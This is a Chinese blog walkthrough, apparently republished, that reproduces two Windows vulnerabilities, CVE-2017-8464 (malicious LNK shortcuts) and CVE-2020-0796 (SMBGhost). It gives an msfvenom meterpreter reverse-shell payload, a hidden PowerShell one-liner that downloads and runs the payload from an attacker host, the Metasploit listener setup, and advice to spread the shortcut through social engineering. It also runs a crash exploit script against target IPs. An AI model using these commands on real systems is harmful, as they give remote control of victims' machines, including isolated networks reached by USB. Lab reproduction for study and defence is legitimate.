CVE-2017-8464 震网三代 漏洞说明:
2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危
传播的载体一般是LNK,LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。
危害:
被攻击机插入存在攻击Ink的U盘后会反弹shell,哪怕是被隔离的内网,也可以在不上网的情况下被攻击。
利用原理
创建恶意快捷方式,包含恶意执行脚本,点击恶意快捷方式,导致本机中病毒且被远控。
实战利用
1、启动msf
2、使用MSF创建一个后门
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.52.133 lport=4445 -f psh-reflection>/var/www/html/link.ps1
3、在kali下开启apache2
service apache2 start
4、通过社会学进行快捷方式传播
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.52.133/link.ps1');test.ps1"
5、 MSF终端配置监听
use exploit/multi/handler
配置payload
set payload windows/x64/meterpreter/reverse_tcp
输入 : show options 配置payload
set lhost `<当前机器ip>` 设置 LHOST
set lport `<未被占用的端口>` 设置 LPORT
6、运行
7、靶机中运行快捷方式
8、成功
CVE-2020-0796 漏洞
“永恒之黑”漏洞高危之处在于对SMB客户端的攻击,攻击者可以通过构造一个“特制”的网页、压缩包、共享目录、OFFICE文档等,向攻击目标发送,一旦被攻击者打开则瞬间触发漏洞受到攻击。
漏洞成因:
CVE-2020-0796 漏洞存在于受影响版本的 Windows 驱动 srv2.sys 中,由于 Windows SMB 更新到 3.1.1 版本增加了对压缩数据的支持,未对用户传输的压缩数据的合法性进行校验。
过程:
使用奇安信的漏洞探测工具
直接在cmd中启动 CVE-2020-0796-Scanner.exe
使用CVE-2020-0796 蓝屏工具进行攻击文章来源:https://www.toymoban.com/news/detail-496644.html
python3 CVE-2020-0796.py `<查询到存在漏洞的IP>`
python3 CVE-2020-0796.py 192.168.3.xxx
成功截图(我没成功,我是垃圾)
文章来源地址https://www.toymoban.com/news/detail-496644.html
到了这里,关于两个CVE漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!